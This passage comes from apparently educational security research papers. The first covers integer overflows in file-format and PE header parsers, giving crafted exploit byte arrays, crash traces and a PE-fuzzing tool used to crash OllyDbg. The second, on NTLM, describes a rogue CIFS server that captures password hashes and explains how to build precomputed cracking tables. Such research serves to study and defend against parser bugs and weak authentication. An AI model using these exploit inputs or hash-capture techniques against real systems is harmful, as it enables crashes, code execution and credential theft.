+which hold the length of the certificate referred to by this +structure, and the offset to the beginning of the certificate +respectively. The last element is an unsigned char, which is used +to carry the body of the certificate by the compiler. + += Applied Examples + + +As the number of buffer overflows decreases, the number of integer +overflows and improper file and binary protocol parsing bugs +increases. The following URL query to OSVDB's (Open Source +Vulnerability) database for integer overflows is a perfect example +of the diversity of applications affected. The list is rather short +considering the number of vulnerabilities actually released in the +past two - three years. Still, it accurately displays different +levels of severity: Kernel, Library, Protocol and file format bugs. + +http://osvdb.org/searchdb.php?action=search_title&vuln_title=integer+overflow&Search=Search + + +As a proof of concept, I developed a parsing library for the +construct above. 
See Appendix A for code. The code functionality +is simple. As explained above it consolidates certificates (in this +example) into a single file. There are several bugs in the library +that I mocked from actual implementations of different open source +and closed source applications. The first vulnerability exists in +the single cert extraction tool 'certextract.c'. The issue is +pretty obvious; the library trusts that the file being parsed has +not been tampered with. The following code snippet highlights the +issue: + + +igned char cert_out[MAX_CERT_SIZE]; +16 unsigned char *extract_cert = "req1.DER"; +... +64 pCertData = (PCERTDATA)(image + get_cert(image,extract_cert)); +65 +66 memcpy(cert_out,(image + pCertData->PointerToDERs), pCertData->CertificateLen); +... + + +The vulnerability exists because the library assumes the certificates +will not be larger than MAX_CERT_SIZE due to the compiler's +inability to take files larger than the set size. All an attacker has +to do is modify the file using an external editor or reverse engineering +the file format and creating a malicious certificate db. A step-by-step +example on exploitation of this bug is out of the scope of this +document, but let's look at what has to be done to prepare an exploit +for this vulnerability. + + +We already know we have to modify the length field to something +larger than MAX_CERT_SIZE or if we look specifically at +'certlib.h', larger than 2048 bytes. Looking at the structure of +the headers, we can see that each certificate has its own length +field. So creating a valid structure header and placing it at a +correct offset along with a corresponding payload should do the +trick. With this in mind, calculate the number of bytes from the +beginning of the file to the first certificate. + + +[SIG 4 bytes][Element Count 2 bytes][First Struct 6 bytes][Our Fake Cert Struct] + + +It seems we can drop our fake structure after the 12th byte. The +cert structure will look something like the following (depending on +the size of the payload you are using): + + +unsigned char exploit_dat1[] = { + + /* Name of our fake cert */ + 0x72, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00, + /* our, length */ + 0x53, 0x08, + /* where we can write our data, PointerToDer*/ + 0x18, 0x00, + /* DataPtr just for completion */ + 0x00, 0x00, 0x00, 0x00 +}; + + +Notice the length is an unsigned short integer that limits our payload +to 0xFFFF (65535), which should be more than enough space. The +two most important sections of our structure are the length, and the value +we give PointerToDer since this will point to the beginning of our +payload. Since we are choosing to make our fake certificate the first +one on the list, anything below it can be overwritten with little +concern. At offset 0x18 of the dat file we have 0x0853 +bytes of A's, notice there is no bounds check on this value. Below is a +sample run of a valid certsdb.dat file and a second sample run with our +malicious dat file. + + +(xbud@yakuza <~/code/random>) $./certextract certsdb.dat out.DER +cert req1.DE +len: 657 PtrToData: 90 + +(xbud@yakuza <~/code/random>) $md5sum req1.DER out.DER +e3e45e30b18a6fc9f6134f0297485cc1 req1.DER +e3e45e30b18a6fc9f6134f0297485cc1 out.DER + +(gdb) r ./badcertdb.dat out.DER +Starting program: /home/xbud/code/random/certextract ./badcertdb.dat out.DER +cert req1.DE +len: 2131 PtrToData: 27 + +Program received signal SIGSEGV, Segmentation fault. +0x41414141 in ?? 
() + + +The actual exploitation of this vulnerability is left as an exercise +for the reader, given the file structure necessary to build the attack +it is now trivial to complete. + += Continuing Applied Examples + + +The utility 'certdb2der.c' provided in this example suite iterates +through the dat file and dumps the contents of each certificate into +individual files. The CERTFF (Certificate File Format) structure +contains an element called NumberOfCerts of type unsigned int. This +integer explicitly controls the loop iterator, controlling the number +of CERTDATA structures said to be in the body of dat file. + + +59 pCertFF = (PCERTFF)(image + OFFSET_TO_CERT_COUNT); +60 alloc_size = (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA); +61 +62 pCertData = (PCERTDATA)malloc(alloc_size); +63 +64 memcpy(pCertData,(image + pCertFF->PointerToCerts),alloc_size - 1); + + +An integer overflow condition may be triggered during memory allocation +for the 'pCertData' array of structures. If a specially crafted dat +file contains a high enough value during memory allocation, pCertDat +array is deemed inproper by the multiplication in +line 60 (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA). +The maximum value for an unsigned integer is (4294967295) or +0xffffffff, so when the value at NumberOfCerts is multiplied +by sizeof(CERTDATA) or 16 bytes an overflow occurs causing the value +to wrap resulting in an invocation negative malloc() or a malloc(0). +This could then be leveraged into executing arbitrary code on certain +malloc implementations by overwriting control structures in the heap. +Again, exploitation is not covered in detail, but pre-exploitation is +explained below. Please refer to the references section for papers +covering heap overflow exploitation. + + +Constructing a fake valid CERTFF chunk and properly placing it in a dat +file will be what most of the work consists of when preparing for file +format exploit. The first 6 bytes of our file will remain the same, so +we can assume our exploit to look something to the following: + + +[ 4 ][ 2 ][ 6 ][Cert 1][Cert 2][Cert ...] +[SIG][Element Count][Fake Number of Certs + 2 bytes][Our Fake Certs ] + + +unsigned char exploit_dat1[] = { + /* header info */ + 0x4f, 0x50, 0x00, 0x00, 0x01, 0x00, + /* our length followed by our certs pointer */ + 0xff, 0xff, 0xff, 0xff, + 0x0a, 0x00, + /* One valid cert */ + 0x70, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00, + /* our length */ + 0x00, 0x07, + /* where we can write our data to PointerToDer*/ + 0x00, 0x26, + /* DataPtr useless to us */ + 0x00, 0x00, 0x00, 0x00, +}; + +unsigned char exploit_dat2[] = { + /* fake certs for fill */ + 0x41, 0x41, 0x41, 0x41, 0x2e, 0x41, 0x41, 0x00, + /* our length */ + 0x00, 0x10, + /* where we can write our data to PointerToDer*/ + 0x26, 0x04, + /* DataPtr useless to us */ + 0x00, 0x00, 0x00, 0x00, +}; + + +The pseudo code below denotes the structure of the rest of the binary +dat file. + + +for(i = sizeof(exploit_dat1); i < buf.length; i+= sizeof(exploit_dat2)) + memcopy(buf + i,exploit_dat2, sizeof(exploit_dat2)); + + +In short, the code copies the contents of our second structure +, after the 24th byte till the end of the buffer is +reached. The following displays an iteration of the utility used correctly, +followed by an iteration through the malicious certificates db file. + + +(xbud@yakuza <~/code/random>) $./certdb2der reqs/certsdb.dat +req1.DE of length: 657 is being written to disk... +req2.DE of length: 649 is being written to disk... 
+req3.DE of length: 653 is being written to disk... +req4.DE of length: 651 is being written to disk... +req5.DE of length: 652 is being written to disk... +(xbud@yakuza <~/code/random>) $ + +(gdb) r 2badcertdb.dat +Starting program: /home/xbud/code/random/certdb2der 2badcertdb.dat + +Program received signal SIGSEGV, Segmentation fault. +0xb7e1267f in memcpy () from /lib/tls/libc.so.6 +(gdb) x/i $pc +0xb7e1267f : repz movsl %ds:(%esi),%es:(%edi) +(gdb)i reg +eax 0xffffffff -1 +ecx 0x3fff9c02 1073716226 +edx 0x804a008 134520840 +... + + +Reconstructing our memcpy(buf,edx (our fake certs), eax (-1)), the value +stored in eax is -1 which when converted to unsigned inside memcpy, 4GB +of data are copied into our destination buffer of only 0x800 bytes in +size. + += Case Study += The Microsoft PE/COFF Headers + + +There a number of documents and tools out there that explain the +structure of Microsoft's infamous PE (Portable Executable) and old +Unix Style COFF (Common Object File Format) header. As such, I will +refrain from elaborating on what each element inside each structure +does. Instead, I will focus on the critical sections that may allow +an attacker to alter the contents of header elements specifically to +break implementations of PE/COFF parsers. + + +With that in mind we can now begin our journey into the world of PE. +At file offset 0x3C as specified in MS's pecoff.doc, there is a four +byte signature PE, immediately after the signature of the +image file, there is a standard COFF header of the following format: + + +IMAGE_FILE_HEADER //(Coff) +{ + unsigned short Machine; + unsigned short NumberOfSections; + unsigned int TimeDateStamp; + unsigned int PointerToSymbolTable; + unsigned int NumberOfSymbols; + unsigned short SizeOfOptionalHeader; + unsigned short Characteristics; +} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; + + +Does anything look similar to our hypothetical file format used in +the examples above? + + +NumberOfSections and NumberOfSymbols are all synonymous to +NumberOfCerts with respect to their own file format. These +elements, along with SizeOfOptionalHeader make for interesting +attack vectors. Before strolling further along into the COFF Header +specifics, it is important to pay a bit more attention to the offset +0x3C being referred to in the PECOFF.doc document. It +states that the file offset specified at offset 0x3C from +the image file, points to the PE signature. + + +What would happen if this file offset was bogus? What if the offset +at offset 0x3C points to fstat(image).st_size + 1 ? +We cause the parser to access illegal memory. This bug was present in +the majority of the PE Viewers tested. Although the significance of this +bug is minimal since the modified binary will no longer execute, picture a +scenario where an attacker simply needs to crash an application which +happens to preprocess a PE Header? All an attacker must do to trigger +this bug is build a fake MZ header also known as a Dos Stub header and +invalidate the 0x3C offset. The MS-DOS Stub is a +valid application that runs under MS-DOS and is placed at the front of the +.EXE image. The linker places a default stub here, which prints out the +message "This program cannot be run in DOS mode" when the image is run in +MS-DOS. + + +The second element, NumberOfSections, indicates the number of +Section Headers this file has mapped. Once again, fuzzing this +element with random numbers yields interesting results on tools +like, MSVC dumpbin.exe, PEView, PE Explorer, msfpescan etc... 
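
Neither failure mode requires anything exotic to defend against. The following is a minimal sketch, not anyone's actual implementation, of the kind of sanity checking a parser could apply before trusting either the offset stored at 0x3C or NumberOfSections. The function name is made up for illustration, the file is assumed to have been read completely into memory, IMAGE_FILE_HEADER refers to the COFF structure quoted above (or the equivalent definition in the platform headers), and 40 is the size of a single section header.

#include <string.h>

/* Minimal sanity check for the offset at 0x3C and NumberOfSections,
 * assuming the whole file sits at 'image' and is 'image_size' bytes. */
int pe_headers_look_sane(unsigned char *image, unsigned int image_size)
{
    unsigned int e_lfanew, headers_end;
    PIMAGE_FILE_HEADER coff;

    /* Need at least the 4 byte offset field stored at 0x3C */
    if (image_size < 0x40)
        return 0;

    memcpy(&e_lfanew, image + 0x3C, 4);

    /* The offset must leave room inside the file for the 4 byte
     * "PE\0\0" signature and the COFF header that follows it */
    if (e_lfanew > image_size - (4 + sizeof(IMAGE_FILE_HEADER)))
        return 0;

    if (memcmp(image + e_lfanew, "PE\0\0", 4) != 0)
        return 0;

    coff = (PIMAGE_FILE_HEADER)(image + e_lfanew + 4);

    /* The declared section headers (40 bytes each) must fit in the
     * data that actually remains after the optional header */
    headers_end = e_lfanew + 4 + sizeof(IMAGE_FILE_HEADER) +
                  coff->SizeOfOptionalHeader;

    if (headers_end > image_size)
        return 0;

    if ((unsigned int)coff->NumberOfSections * 40 > image_size - headers_end)
        return 0;

    return 1;
}

A parser that rejects the file at this point loses nothing, since such an image could never have been mapped correctly in the first place.
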
+ + +Continuing our dive into PE madness, following the COFF Header there +is an OPTIONAL_HEADER also referred to as the PE Header which +consists of the following elements: + + +_IMAGE_OPTIONAL_HEADER32 { + unsigned short Magic; + ... + unsigned int ImageBase; + ... + unsigned short MajorOperatingSystemVersion; + unsigned short MinorOperatingSystemVersion; + ... + unsigned int SizeOfImage; + unsigned int SizeOfHeaders; + ... + unsigned int LoaderFlags; + unsigned int NumberOfRvaAndSizes; + IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; +} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; + + +There were a number of elements omitted here for the sake of brevity, +most of which aid the loader in identifying the type of file and its +core mappings. Please refer to the appendix for more information on +what each specific element means. Again, several elements in this +structure look interesting enough to play with, however we will only be +looking at the IMAGE_DATA_DIRECTORY array of entries. In +particular, the first index of that directory contains a pointer to the + structures. The element EXPORT/IMPORT_DIRECTORY_TABLE +NumberOfRvaAndSizes in the structure above refers to the number of +elements in the DataDirectory array. The following is the + structure which is the last structure +fuzzed for this case study. + + + +_EXPORT_DIRECTORY_TABLE { + unsigned long Characteristics; + unsigned long TimeDateStamp; + unsigned short MajorVersion; + unsigned short MinorVersion; + unsigned long NameRVA; + unsigned long OrdinalBase; + unsigned long NumberOfFunctions; + unsigned long NumberOfNames; + unsigned long ExportAddressTableRVA; + unsigned long ExportNameTableRVA; + unsigned long ExportOrdinalTableRVA; +} EXPORT_DIRECTORY_TABLE, *PEXPORT_DIRECTORY_TABLE; + + + The Export Directory Table contains address information that is +used to resolve fix-up references to the entry points within this image. +The elements NumberOfFunctions, NumberOfNames indicate the obvious and +again if something trusts the number in this structure without error +checking, unexpected results can occur. + += Introducing breakdance.c + + +Although file fuzzing is relatively simple, tools help reduce the amount +of time it takes for you to reconstruct a format to reach deep into a +section buried within several structures. I typically use +xxd -i, hd (hexdump), or shred (hexeditor) +for windows to reconstruct a binary image and fuzz the structures +manually, but I decided to develop a tool to do the work for me in the +case of PE. The following options are available: + + +Usage: ./breakdance [parameters] +Options: + -v verbose + -o [file] File to write to (defaults) out.ext + -f [file] File to read from + -e [value] Modify Export Directory Table's number + of functions and number of names + -p Print sections of a PE file and exit + -c Create new section (.pepe) not to be used with -m + -s [section] Section to overwrite (can be used with -c) + -m [section] [value] + -n [length] Fuzz Export Directory Table's Strings + Modify [section] with [int] where: + section is one of [image_start] [number_of_sections] + + ex. ./breakdance -v -o out -f pebin -m "image_start" 65536 + ex. ./breakdance -v -o out -f pebin -c -s .rdata + +[Warning if -o option isn't provided with mod options, changes are discarded] + + +The following is a list of binary parsers affected by the fuzzing options +provided by breakdance.c, the list is by no means comprehensive in the +sense of PE parsers but it is all I test against. 
The fuzzing capabilities +are rather minimal considering the number of structures and elements +accompanied by the PE/COFF specification, however it is enough to +demonstrate how broken, binary parsers can be. + + + +--------------+-----------------+-------------------+ + | Tool Name | Vendor | Section | + +--------------+-----------------+-------------------+ + | PE View | Wayne Radburn | All | + | MSVS bindump | Microsoft | All | + | OllyDbg | Oleh Yuschuk | NumberOfFunctions | + | PE Explorer | Haeventools.com | NumberOfSections | + +--------------+-----------------+-------------------+ + + += Affected Toolsets + + + +Although I can almost guarantee other parsers are just as buggy, +this selection is pretty well known and should suffice as a +demonstration. The only issue I will elaborate on is the OllyDebug +denial of service attack. This issue is interesting due to the fact +that even after modifying the PE Image to DoS OllyDebug, the binary +itself is still executable. This can be leveraged as an attack +vector against reverse engineerers who rely on olly debug to reverse +binaries. The following is a run of breakdance against a DLL. + + +(xbud@yakuza <~/code/random>) $./breakdance -v -e 4294967295 -f \ +/home/xbud/code/libpe/testbins/vncdll.dll -o vnc.dll + +... + +NumberOfFunctions 58, NumberOfNames: 58, now 2147483647,2147483647 +Dumping 348160 bytes + +(xbud@yakuza <~/code/random>) $ + +-- Inside WinDbg -- + +This exception may be expected and handled. +eax=005d44d0 ebx=0000049c ecx=005d46c8 edx=000001f8 esi=01ed0465 edi=00000000 +eip=0045cda4 esp=0012e70c ebp=0012ede8 iopl=0 nv up ei ng nz ac pe cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293 + +*** WARNING: Unable to verify checksum for C:\tools\odbg110\OLLYDBG.EXE +*** ERROR: Symbol file could not be found. Defaulted to export symbols for +C:\tools\odbg110\OLLYDBG.EXE - + +OLLYDBG!Createlistwindow+0x1bb4: +0045cda4 668b0459 mov ax,[ecx+ebx*2] ds:0023:005d5000=???? + +0:000> kb +ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +0012ede8 0045f7eb 01ed0465 76bf1f1c 76bf2075 OLLYDBG!Createlistwindow+0x1bb4 +00000000 00000000 00000000 00000000 00000000 OLLYDBG!Decoderange+0x180b + + += Conclusions + + +The general rule of thumb here is not to trust any user modifiable +data. The trust between application and input components such as +sockets, file I/O, named pipes etc. should always be minimal and at +an extreme, should be considered dangerous. The fact that a file +format specification exists is not an excuse to assume all data +gathered from an alleged file is valid. Validate your input against +a working ruleset, and if the assertion fails, raise an exception. +Keeping your code simple means accept only valid input, deny all +variants. + + +All the code referenced is provided in the attached tar ball, a +safer version of the library for parsing the hypothetical file +format developed for this paper is included for demonstration +purposes. + += Bibliography + + +OSVDB. OSVDB Advisory Descriptions +http://www.osvdb.org + + +Microsoft Corporation. PECoff Specification +http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx + + +blexim. 
Integer Overflows +http://www.phrack.org/show.php?p=60&a=10 diff --git a/uninformed/3.4.txt b/uninformed/3.4.txt new file mode 100644 index 0000000..c9dbdc4 --- /dev/null +++ b/uninformed/3.4.txt @@ -0,0 +1,458 @@ +Attacking NTLM with Precomputed Hashtables +warlord +warlord@nologin.org + + +1) Introduction + + +Breaking encrypted passwords has been of interest to hackers for a long +time, and protecting them has always been one of the biggest security +problems operating systems have faced, with Microsoft's Windows being no +exception. Due to errors in the design of the password encryption +scheme, especially in the LanMan(LM) scheme, Windows has a bad track in +this field of information security. Especially in the last couple of +years, where the outdated DES encryption algorithm that LanMan is based +on faced more and more processing power in the average household, +combined with ever increasing harddisk size, made it crystal clear that +LanMan nowadays is not just outdated, but even antiquated. + +Until now, breaking the LanMan hashed password required somehow +accessing the machine first of all, and grabbing the password file, +which didn't render remote password breaking impossible, but as a remote +attacker had to break into the system first to get the required data, it +didn't matter much. This paper will try to change this point of view. + + +2) The design of LM and NTLM + +2.1) The LanMan disaster + + +By default Windows stores all users passwords with two different hashing +algorithms. The historically weak LanMan hash and the more robust MD4. +The LanMan hash is based on DES and has been described in Mudge's rant +on the topic. A brief recap of the LM hash is below, though those +unfamilliar with LM will probably want to read. + +First of all, Windows takes a password and makes sure it's 14 bytes +long. If it's shorter than 14 bytes, the password is padded with null +bytes. Brute forcing up to 14 characters can take a very long time, but +two factors make this task way more easy. First, not only is the set of +possible characters rather small, Microsoft further reduces it by making +sure a password is stored all uppercase. That means "test" is the same +as "Test" is the same as "tesT" is the same as...well...you get the +idea. Second, the password is not really 14 bytes in size. Windows +splits it up into two times 7 bytes. So instead of having to brute force +up to 14 bytes, an attacker only has to break 7 bytes, twice. The +difference is (keyspace^14) versus (keyspace^7)*2. That's a huge +difference. + +Concerning the keyspace, this paper focuses on the alphanumerical set of +characters only, but the entire possible set of valid characters is: + + +ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 %!@\#$%^&*()_-=+`~[]\{}|\:;"'<>,.?/ + + +The next problem with LM stems from the total lack of salting or cipher +block chaining in the hashing process. To hash a password the first 7 +bytes of it are transformed into an 8 byte odd parity DES key. This key +is used to encrypt the 8 byte string "KGS!@". Same thing happens with +the second part of the password. + +This lack of salting creates two interesting consequences. Obviously +this means the password is always stored in the same way, and just begs +for a typical lookup table attack. The other consequence is that it is +easy to tell if a password is bigger than 7 bytes in size. If not, the +last 7 bytes will all be null and will result in a constant DES hash of +0xAAD3B435B51404EE. 
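
To illustrate the second consequence, the fragment below flags a LM hash whose second half is that well-known constant, which immediately tells an attacker that the password is at most 7 characters long. This is a minimal sketch that assumes the raw 16 byte hash is already available in a buffer.

#include <string.h>

/* DES output for an all-null second password half, as given above */
static const unsigned char lm_empty_half[8] =
    { 0xAA, 0xD3, 0xB4, 0x35, 0xB5, 0x14, 0x04, 0xEE };

/* Returns 1 when the LM hash betrays a password of 7 characters or less */
int lm_password_is_short(const unsigned char lmhash[16])
{
    return memcmp(lmhash + 8, lm_empty_half, 8) == 0;
}
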
+ +As I already pointed out, LM has been extensively documented. +"L0phtcrack" and "John the Ripper" are both able brute force tools to +break these hashes, and Philippe Oechslin of the ETH Zuerich was the +first to precompute LM lookup tables that allow breaking these hashes in +seconds. + +2.2) NTLM + + +Microsoft attempted to address the shortcomings of LM with NTLM. Windows +NT introduced the NTLM(NT LanManager) authentication method to provide +stronger authentication. The NTLM protocol was originally released in +version 1.0(NTLM), and was changed and fortified in NT SP6 as NTLMv2. +When exchanging files between hosts in a local area network, printing +documents on a networked printer or sending commands to a remote system, +Windows uses a protocol called CIFS - the Common Internet File System. +CIFS uses NTLM for authentication. + +In NTLM, the protocol covered in this document, the authentication works +in the following manner. When the client connects to the server and +requests a new session, the server replies with a positive session +response. Next, the client sends a request to negotiate a protocol for +one of the many dialects of the SMB/CIFS family by providing a list of +dialects that it understands. The server picks the best out of those and +sends the client a response that names the protocol to use, and includes +a randomly generated 8 byte challenge. + +In order to log in now, the client sends the username in plaintext(!), +and also the password, hashed NTLM style. The NTLM hash is generated in +the following manner: + + +[UsersPassword]->[LMHASH]->[NTLM Hash] + + +The NTLM hash is produced by the following algorithm. The client takes +the 16 byte LM hash, and appends 5 null bytes, so that the result is a +string of 21 bytes length. Then it splits those 21 bytes into 3 groups +of 7 bytes. Each 7 byte string is turned into an 8 byte odd parity DES +key once again. Now the first key is used to encrypt the challenge with +the DES algorithm, producing an 8 byte hash. The same is done with keys +2 and 3, so that there are two additional 8 byte hashes. These 3 hashes +are simply concatenated, resulting in a single 24 byte hash, which is +the one being sent by the client as the encrypted password. + +Mudge already pointed out why this is really stupid, and I'll just +recapitulate his reasons here. An attacker capable of sniffing traffic +can see the username, the challenge and the 24 byte hash. + +First of all, as stated earlier, if the password is less than 8 bytes, +the second half of the LM hash always is 0xAAD3B435B51404EE. For the +purpose of illustration, let's assume the first part of the hash is +0x1122AABBCCDDEEFF. So the entire LM hash looks like: + + +------------------------------------------- +| 0x1122AABBCCDDEEFF | 0xAAD3B435B51404EE | +------------------------------------------- + + +When transforming this into an NTLM hash, the first 8 bytes of the new +hash are based solely on the first 7(!) bytes of the LM hash. The second +8 byte chunk of the NTLM hash is based on the last byte of the first LM +hash, and first 6 bytes of the second LM hash. Now there are 2 bytes of +the second LM hash left. Those two, padded with 5 null bytes and used to +encrypt the challenge, form the third 8 byte chunk of the NTLM hash. 
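
Expressed as code, the construction is compact. The sketch below assumes a helper named des56_encrypt() that expands a 7 byte block into an odd parity DES key and encrypts a single 8 byte block with it; that helper is hypothetical and is only named here for illustration.

#include <string.h>

/* Hypothetical helper: expand key7 into an odd parity DES key and
 * encrypt the 8 byte block 'in' into 'out'. Not implemented here. */
void des56_encrypt(const unsigned char key7[7],
                   const unsigned char in[8], unsigned char out[8]);

/* Build the 24 byte response from the 16 byte LM hash and the 8 byte
 * challenge, following the scheme described above. */
void ntlm_response(const unsigned char lmhash[16],
                   const unsigned char challenge[8],
                   unsigned char response[24])
{
    unsigned char buf[21];
    int i;

    memcpy(buf, lmhash, 16);     /* 16 byte hash ...             */
    memset(buf + 16, 0, 5);      /* ... padded with 5 null bytes */

    /* Three 7 byte chunks, each used as a DES key on the challenge */
    for (i = 0; i < 3; i++)
        des56_encrypt(buf + i * 7, challenge, response + i * 8);
}

The worked example that follows simply walks the same three chunks through with concrete values.
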
+That means in the example this padded LM hash + + +------------------------------------------------------ +| 0x1122AABBCCDDEE | FFAAD3B435B514 | 04EE0000000000 | +------------------------------------------------------ + + +is being turned into the 24 byte NTLM hash. If the password is smaller +than 8 characters in size, the third part, before being hashed with the +challenge to form the NTLM hash, will always look like this. So in order +to test wether the password is smaller than 8 bytes, it's enough to take +this value, the 0x04EE0000000000, and use it to encrypt the challenge +that got sniffed from the wire. If the result equals the third part of +the NTLM hash which the client sent to the server, it's a pretty safe +bet to say the password is no longer than 7 chars. It's even possible to +make sure it is. Assuming from the previous result that the second LM +hash looks like 0xAAD3B435B51404EE, the second chunk of the 24 byte NTLM +hash is based on 0x??AAD3B435B514. The only part unknown is the first +byte, as this one is based on the first LM hash. One byte, thats 256 +permutations. By brute forcing those up to 256 possibilities as the +value of the first byte, and using the resulting key to encrypt the +known challenge once again, one should eventually stumble over a result +that's the same as the second 8 bytes of the NTLM hash. Now one can rest +assured, that the password really is smaller than 8 bytes. Even if the +password is bigger than 7 bytes, and the second LM hash does not end +with 0x04EE thus, creating all possible 2 byte combinations, padding +them with 5 null bytes and hashing those with the challenge until the +final 8 byte chunk of the NTLM hash matches will easily reveal the final +2 byte of the LM hash, with no more than up to 64k permutations. + +2.3) The NTLM challenge + + +The biggest difference between the way the LM and the NTLM hashing +mechanism works is the challenge. In NTLM the challenge acts like a a +salt in other cryptographic implementations. This throws a major wrench +in our pre-computing table designs, adding 2^64 permutations to the +equation. + +3.0) Breaking NTLM with precomputed tables + +3.1) Attacking the first part + +Precomputing tables for NTLM has just been declared pretty much +impossible with todays computing resources. The problem is pre-computing +every possible hash value (and then, of course storing those values even +if computation was possible). By applying a trick to remove the +challenge from the equation however, precomputing NTLM hashes becomes +almost as easy as the creation of LM tables. By writing a rogue CIFS +server that hands out the same static challenge to every client that +tries to connect to it, the problem has static values all over the place +once again, and hashtable precomputation becomes possible. + +The following screenshot depicts a proof of concept implementation that +accepts an incoming CIFS connection, goes through the protocol +negotiation phase with the connecting client, sends out the static +challenge, and disconnects the client after receiving username and NTLM +hash from it. The server also logs some more information that the client +conveniently sends along. 
+ + +IceDragon wincatch bin/wincatch +This is Alpha stage code from nologin.org +Distribution in any form is denied + + +Src Name: BARRIERICE +IP: 192.168.7.13 +Username: Testuser +Primary Domain: BARRIERICE +Native OS: Windows 2002 Service Pack 2 2600 +Long Password Hash: 3c19dcbdb400159002d8d5f8626e814564f3649f0f918666 + + +That's a Windows XP machine connecting to the rogue server running +on Linux. The client is connecting from IP address 192.168.7.13. The +username is ``Testuser'', the name of the host is ``BarrierIce'', +and the password hash got captured too of course. + +3.2) Table creation + + +The creation of rainbow tables to precompute the hashes is a good +approach to easily breaking the hashes now, but as harddisks grow bigger +and bigger while costing ever less, I decided to roll my own table +layout instead. As the reader will see, my approach requires way more +harddisk space than rainbow tables do since they are computationally +less expensive to create and contain a determined set of data, unlike +rainbow tables with their less than 100 probability approach to contain +a certain password. + +In order to create those tables, the big question is how to efficiently +store all the data. In order to stay within certain bounds, I decided to +stick to alphanumeric tables only. Alphanumeric, that's 26 chars from +a-z, 26 chars from A-Z, and additional 10 for 0-9. Thats 62 possible +values for each character, so thats 62^7 permutations, right? Wrong. +NTLM hashes use the LM hash as input. The LM hashing algorithm +upper-cases its input. Therefore the possible keyspace shrinks to 36 +characters, and the number of possible permutations goes down to 36^7. +The only other input that needs accounting is the NULL padding bytes +used, bringing the total permutations to a bit more than 36^7. + +The approach taken here to allow for easy storage and recovery of hashes +and plain text is essentially to place every possible plaintext password +into one of 2048 buckets. It could easily be expanded to more. The table +creation tool simply generates every valid alphanumeric password, hashes +it and checks the first 11 bits of the hash. These bits determine which +of the 2048 buckets (implemented as files in this case) the plaintext +password belongs to. The plaintext password is then added to the bucket. +Now whenever a hash is captured, looking at the first 11 bits of the +hash determines the correct bucket to look into for the password. All +that's left to do now is hashing all the passwords in the bucket until a +match is found. This will take on average case ((36^7)/2048))/2, or +19131876 hash operations. This takes approximately three minutes on my +Pentium 4 2.8 Ghz machine. It takes the NTLM table generation tool 94 +hours to run on my machine. Fortunately, I only had to do that once :) + +The question is how to store more than 36^7 plaintext passwords, ranging +in size from 0(empty password) to 7 bytes. + +Approach 1: Store each password separated by newlines. As most passwords +are 7 byte in size and an additional newline extends that to 8 byte, the +outcome would be somewhere around (36^7)*8 bytes. That's roughly 584 +gigabytes, for the alphanumeric keyspace. There has to be a better way. + +Approach 2: By storing each password with 7 bytes, be it shorter than 7 +or not, the average space required for each password goes down from 8 to +7, as it's possible to get rid of the newlines. There's no need to +separate passwords by newlines if they're all the same size. 
(36^7)*7 is +still way too much though. + +Approach 3: The plaintext passwords are generated by 7 nested loops. The +first character changes all the time. The second character changes every +time the first has exhausted the entire keyspace. The third increments +each time the second has exhausted the keyspace and so on. What's +interesting is that the final 3 bytes rarely change. By storing them +only when they change, it's possible to store only the first 4 bytes of +each password, and once in a while a marker that signals a change in the +final 3 bytes, and is followed by the 3 byte that now form the end of +each plaintext password up to the next marker. That's roughly (36^7)*4 +bytes = 292 gigabytes. Much better. Still too much. + +Approach 4: For each character, there's 37 possible values. A-Z, 0-9 and +the 0 byte. 37 different values can be expressed by 6 bits. So we can +stuff 4 characters into 4*6 = 24 bits, which is 3 byte. How convenient! +(37^7)*3 == 265 gigabytes. Still too much. + +Approach 5: The passwords are being generated and stored in a +consecutive way. The hash determines which bucket to place each new +plaintext password into, but it's always 'bigger' than the previous one. +Using 2048 buckets, a test showed that, within any one file, no offset +between a password being stored and the next one stored into this bucket +exceeded 55000. By storing offsets to the previous password instead of +the full word, each password can be stored as a 2 byte value. + +For example, say the first password stored into one bucket is the one +char word "A". That's index 10 in the list of possible characters, as it +starts with 0-9. The table creation tool would now save 10 into the +bucket, as it's the first index from the start of the new bucket, and +it's 10 bigger than zero, the start value for each bucket. Now if by +chance the one character password "C" was to be stored into the same +bucket next, the number 2 would be stored, as "C" has an offset of 2 to +the previous password. If the next password for this bucket was "JH6", +the offset might be 31337. + +Basically each password is being stored in a base36 system, so the first +2 byte password, being "00", has an index of 37, and all the previous +password offsets and the offset for "00" itself of the bucket that "00" +is being stored in add up to 37. To retrieve a password saved in this +way requires a transformation of the decimal index back into the base36 +system, and using the resulting individual numbers as indexes into the +char keyspace[]. + +The resulting table size is (36^7 )*2 == 146 gigabytes. Still pretty +big, but small enough to easily fit on today's harddisks. As I mentioned +earlier the actual resulting size is a bit bigger in fact, as a bunch of +passwords that end with null bytes have to be stored too. In the end +it's not 146 gigabytes, but 151 instead. + +3.3) The big problem + + +Now there's a big problem concerning the creation of the NTLM lookup +tables. The first 8 byte of the final hash are derived from the first 7 +byte of the LM hash, which are derived from the first 7 byte of the +plaintext password. Creating tables to match the first 8 byte of the +NTLM hash to the first 7 bytes of the password is thus possible, but the +same tables do not work for the second or even third block of the 24 +byte NTLM hash. + +The second 8 byte chunk of the hash is derived from the last byte of the +first LM hash, and the first 6 byte of the second LM hash. This first +byte adds 256 possible values to the second LM hash. 
While the first 8 byte chunk of the 24 byte NTLM hash stems purely from the LM hash of a plaintext password, the second 8 byte chunk stems from an undetermined byte plus an additional 6 bytes of a LM hash.

